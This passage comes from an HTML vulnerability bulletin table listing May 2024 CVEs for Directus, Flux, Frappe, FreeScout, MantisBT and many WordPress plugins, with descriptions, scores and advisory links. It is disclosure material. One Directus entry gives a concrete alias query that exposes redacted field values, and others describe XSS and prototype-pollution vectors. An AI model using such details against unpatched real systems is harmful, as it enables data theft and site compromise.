<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2023-6327" target="_blank">CVE-2023-6327</a><br><a href="https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/2.7.4/includes/modules/sales-notification/class.sale_notification.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3080097/woolentor-addons/trunk/includes/modules/sales-notification/class.sale_notification.php?contextall=1&amp;old=3061864&amp;old_path=%2Fwoolentor-addons%2Ftrunk%2Fincludes%2Fmodules%2Fsales-notification%2Fclass.sale_notification.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/263324cb-31b7-40ad-ad7d-4582e128cd75?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>directus--directus<br> </td>
<td>Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.0, session tokens function like the other JWT tokens where they are not actually invalidated when logging out. The `directus_session` gets destroyed and the cookie gets deleted but if the cookie value is captured, it will still work for the entire expiry time which is set to 1 day by default. Making it effectively a long lived unrevokable stateless token instead of the stateful session token it was meant to be. This vulnerability is fixed in 10.11.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34709&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34709" target="_blank">CVE-2024-34709</a><br><a href="https://github.com/directus/directus/commit/a6172f8a6a0f31a6bf4305a090de172ebfb63bcf" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/directus/directus/security/advisories/GHSA-g65h-35f3-x2w3" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>directus--directus<br> </td>
<td>Directus is a real-time API and App dashboard for managing SQL database content. A user with permission to view any collection using redacted hashed fields can get access the raw stored version using the `alias` functionality on the API. Normally, these redacted fields will return `**********` however if we change the request to `?alias[workaround]=redacted` we can instead retrieve the plain text value for the field. This can be avoided by removing permission to view the sensitive fields entirely from users or roles that should not be able to see them. This vulnerability is fixed in 10.11.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34708&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34708" target="_blank">CVE-2024-34708</a><br><a href="https://github.com/directus/directus/commit/e70a90c267bea695afce6545174c2b77517d617b" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/directus/directus/security/advisories/GHSA-p8v3-m643-4xqx" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>divSpot--DS Site Message<br> </td>
<td>Cross-Site Request Forgery (CSRF) vulnerability in divSpot DS Site Message.This issue affects DS Site Message: from n/a through 1.14.4.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34439&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34439" target="_blank">CVE-2024-34439</a><br><a href="https://patchstack.com/database/vulnerability/ds-site-message/wordpress-ds-site-message-plugin-1-14-4-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>envothemes--Envo Extra<br> </td>
<td>The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 1.8.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4385&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4385" target="_blank">CVE-2024-4385</a><br><a href="https://plugins.trac.wordpress.org/browser/envo-extra/trunk/lib/elementor/widgets/button/button.php#L679" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/envo-extra/trunk/lib/elementor/widgets/counter/counter.php#L754" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/envo-extra/trunk/lib/elementor/widgets/icon-box/icon-box.php#L909" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/envo-extra/trunk/lib/elementor/widgets/team/team.php#L1189" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/envo-extra/trunk/lib/elementor/widgets/testimonial/testimonial.php#L899" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3080715/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/83d78ff7-bd59-431e-b579-156e23ede053?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>fluxcd--source-controller<br> </td>
<td>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. The source-controller implements the source.toolkit.fluxcd.io API and is a core component of the GitOps toolkit. Prior to version 1.2.5, when source-controller was configured to use an Azure SAS token when connecting to Azure Blob Storage, the token was logged along with the Azure URL when the controller encountered a connection error. An attacker with access to the source-controller logs could use the token to gain access to the Azure Blob Storage until the token expires. This vulnerability was fixed in source-controller v1.2.5. There is no workaround for this vulnerability except for using a different auth mechanism such as Azure Workload Identity.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-31216&amp;vector=CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-31216" target="_blank">CVE-2024-31216</a><br><a href="https://github.com/fluxcd/source-controller/commit/915d1a072a4f37dd460ba33079dc094aa6e72fa9" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/fluxcd/source-controller/pull/1430" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/fluxcd/source-controller/security/advisories/GHSA-v554-xwgw-hc3w" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>frappe--frappe<br> </td>
<td>Frappe is a full-stack web application framework. Prior to 15.26.0 and 14.74.0, the login page accepts redirect argument and it allowed redirect to untrusted external URls. This behaviour can be used by malicious actors for phishing. This vulnerability is fixed in 15.26.0 and 14.74.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34074&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34074" target="_blank">CVE-2024-34074</a><br><a href="https://github.com/frappe/frappe/commit/65b3c42635038cdff17d3109be6c373bac004829" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/frappe/frappe/pull/26304" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/frappe/frappe/security/advisories/GHSA-7g27-q225-j894" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>freescout-helpdesk--freescout<br> </td>
<td>FreeScout is a free, self-hosted help desk and shared mailbox. Versions of FreeScout prior to 1.8.139 contain a Prototype Pollution vulnerability in the `/public/js/main.js` source file. The Prototype Pollution arises because the `getQueryParam` Function recursively merges an object containing user-controllable properties into an existing object (For URL Query Parameters Parsing), without first sanitizing the keys. This can allow an attacker to inject a property with a key `__proto__`, along with arbitrarily nested properties. The merge operation assigns the nested properties to the `params` object's prototype instead of the target object itself. As a result, the attacker can pollute the prototype with properties containing harmful values, which are then inherited by user-defined objects and subsequently used by the application dangerously. The vulnerability lets an attacker control properties of objects that would otherwise be inaccessible. If the application subsequently handles an attacker-controlled property in an unsafe way, this can potentially be chained with other vulnerabilities like DOM-based XSS, Open Redirection, Cookie Manipulation, Link Manipulation, HTML Injection, etc. Version 1.8.139 contains a patch for the issue.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34698&amp;vector=CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">4.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34698" target="_blank">CVE-2024-34698</a><br><a href="https://github.com/freescout-helpdesk/freescout/commit/2614514bc6d6c4ad563202a1c9cae5a97b195cc5" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/freescout-helpdesk/freescout/security/advisories/GHSA-rx6j-4c33-9h3r" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>giuliopanda--ADFO Custom data in admin dashboard<br> </td>
<td>The ADFO - Custom data in admin dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'dbp_id' parameter in all versions up to, and including, 1.9.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4104&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4104" target="_blank">CVE-2024-4104</a><br><a href="https://plugins.trac.wordpress.org/browser/admin-form/trunk/admin/class-af-list-admin.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3081090%40admin-form&amp;new=3081090%40admin-form&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e61110fc-cc2d-4207-97b6-b21459334216?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>giuliopanda--ADFO Custom data in admin dashboard<br> </td>
<td>The ADFO - Custom data in admin dashboard plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.9.0. This is due to missing or incorrect nonce validation on several functions hooked via the controller() function. This makes it possible for unauthenticated attackers to edit the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4103&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4103" target="_blank">CVE-2024-4103</a><br><a href="https://plugins.trac.wordpress.org/changeset/3081090/admin-form/trunk/admin/class-af-list-admin.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8d797238-f8f3-44d7-8c16-bee23ce12ae0?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>https://elementor.com/--Elementor Website Builder Pro<br> </td>
<td>The Elementor Website Builder - More than Just a Page Builder Pro plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the several parameters in versions up to, and including, 3.21.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4107&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4107" target="_blank">CVE-2024-4107</a><br><a href="https://doc.clickup.com/9011113249/d/h/8chnb91-5091/3951e6f2afbd388" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0d5d47bd-4f05-4dc7-84c1-f7bc1196ee16?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>iePlexus--Featured Content Gallery<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in iePlexus Featured Content Gallery allows Stored XSS.This issue affects Featured Content Gallery: from n/a through 3.2.0.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34424&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">5.9</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34424" target="_blank">CVE-2024-34424</a><br><a href="https://patchstack.com/database/vulnerability/featured-content-gallery/wordpress-featured-content-gallery-plugin-3-2-0-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>iqonicdesign--Graphina Elementor Charts and Graphs<br> </td>
<td>The Graphina - Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4574&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4574" target="_blank">CVE-2024-4574</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/area/widget/area_chart.php#L457" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/bubble/widget/bubble_chart.php#L685" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/candle/widget/candle_chart.php#L517" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/column/widget/column_chart.php#L531" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/distributed_column/widget/Distributed_Column_chart.php#L464" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/donut/widget/donut_chart.php#L325" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/heatmap/widget/heatmap_chart.php#L448" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/line/widget/line_chart.php#L426" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/pie/widget/pie_chart.php#L279" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/polar/widget/polar_chart.php#L413" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/radar/widget/radar_chart.php#L546" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/radial/widget/radial_chart.php#L417" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/scatter/widget/scatter_chart.php#L419" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/charts/timeline/widget/timeline_chart.php#L462" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/area/widget/area_google_chart.php#L570" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/bar/widget/bar_google_chart.php#L524" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/column/widget/column_google_chart.php#L536" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/donut/widget/donut_google_chart.php#L384" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/line/widget/line_google_chart.php#L578" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/graphina-elementor-charts-and-graphs/trunk/elementor/google_charts/pie/widget/pie_google_chart.php#L391" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1febe2d8-d354-4c78-a611-c1bb0937e53d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>ithemelandco--Bulk Posts Editing For WordPress<br> </td>
<td>The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on the plugin's AJAX actions in all versions up to, and including, 4.2.3. This makes it possible for authenticated attackers, with subscriber access and higher, to invoke their corresponding functions. This may lead to post creation and duplication, post content retrieval, post taxonomy manipulation.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4199&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4199" target="_blank">CVE-2024-4199</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&amp;old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/683131a0-eec3-4251-b322-5c2088855687?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>ithemelandco--Bulk Posts Editing For WordPress<br> </td>
<td>The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.3. This is due to missing or incorrect nonce validation on the plugin's AJAX actions.. This makes it possible for unauthenticated attackers to create and duplicate posts, retrieve post content, and modify post taxonomy among other things via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4204&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4204" target="_blank">CVE-2024-4204</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&amp;old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&amp;sfp_email=&amp;sfph_mail=#file51" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/34b39462-32c5-4f7d-b54f-d95f40b6ed92?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>justinbusa--Beaver Builder WordPress Page Builder<br> </td>
<td>The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_target parameter in all versions up to, and including, 2.8.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3923&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3923" target="_blank">CVE-2024-3923</a><br><a href="https://plugins.trac.wordpress.org/browser/beaver-builder-lite-version/tags/2.8.0.7/modules/button/includes/frontend.php#L14" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3078825%40beaver-builder-lite-version%2Ftrunk&amp;old=3062187%40beaver-builder-lite-version%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/99960ff7-62e1-4c44-ae8e-ebda3e075781?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>justinbusa--Beaver Builder WordPress Page Builder<br> </td>
<td>The Beaver Builder - WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the photo widget crop attribute in all versions up to, and including, 2.8.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4430&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4430" target="_blank">CVE-2024-4430</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3083534%40beaver-builder-lite-version%2Ftrunk&amp;old=3078825%40beaver-builder-lite-version%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/cd6ed285-f215-44d3-9db9-9b2bfffee60a?source=cve" target="_blank">security@wordfence.com</a><br><a href="https://www.wpbeaverbuilder.com/change-logs/?utm_medium=bb-lite&amp;utm_source=repo-readme&amp;utm_campaign=repo-changelog-page" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>kraftplugins--Mega Elements Addons for Elementor<br> </td>
<td>The Mega Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Button widget in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4702&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4702" target="_blank">CVE-2024-4702</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085457/mega-elements-addons-for-elementor" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3808ca2a-e78e-4118-890b-c22a71f8e855?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>levelfourstorefront--Shopping Cart &amp; eCommerce Store<br> </td>
<td>The Shopping Cart &amp; eCommerce Store plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.6.4 via the order report functionality. This makes it possible for unauthenticated attackers to extract sensitive data including order details such as payment details, addresses and other PII.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4213&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4213" target="_blank">CVE-2024-4213</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084202/wp-easycart/trunk/admin/inc/wp_easycart_admin.php?old=3068711&amp;old_path=wp-easycart%2Ftrunk%2Fadmin%2Finc%2Fwp_easycart_admin.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/93daab72-1243-4a05-91d3-9254a1aac727?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>litonice13--Master Addons Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor<br> </td>
<td>The Master Addons - Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the title_html_tag attribute in all versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3134&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3134" target="_blank">CVE-2024-3134</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3087193%40master-addons%2Ftrunk&amp;old=3078134%40master-addons%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6106c972-5475-4c19-8630-3a01edc616ad?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>litonice13--Master Addons Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor<br> </td>
<td>The Master Addons - Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in versions up to, and including, 2.0.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4580&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4580" target="_blank">CVE-2024-4580</a><br><a href="https://plugins.trac.wordpress.org/browser/master-addons/trunk/addons/ma-image-hover-effects/ma-image-hover-effects.php#L1546" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/master-addons/trunk/addons/ma-tabs/ma-tabs.php#L1068" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087193/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e3e3ac84-dd82-42b0-80b9-c876731170d5?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>mantisbt--mantisbt<br> </td>
<td>MantisBT (Mantis Bug Tracker) is an open source issue tracker. Improper escaping of a custom field's name allows an attacker to inject HTML and, if CSP settings permit, achieve execution of arbitrary JavaScript when resolving or closing issues (`bug_change_status_page.php`) belonging to a project linking said custom field, viewing issues (`view_all_bug_page.php`) when the custom field is displayed as a column, or printing issues (`print_all_bug_page.php`) when the custom field is displayed as a column. Version 2.26.2 contains a patch for the issue. As a workaround, ensure Custom Field Names do not contain HTML tags.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34081&amp;vector=CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.6</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34081" target="_blank">CVE-2024-34081</a><br><a href="https://github.com/mantisbt/mantisbt/commit/447a521aae0f82f791b8116a14a20e276df739be" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/mantisbt/mantisbt/security/advisories/GHSA-wgx7-jp56-65mq" target="_blank">security-advisories@github.com</a><br><a href="https://mantisbt.org/bugs/view.php?id=34432" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>mantisbt--mantisbt<br> </td>
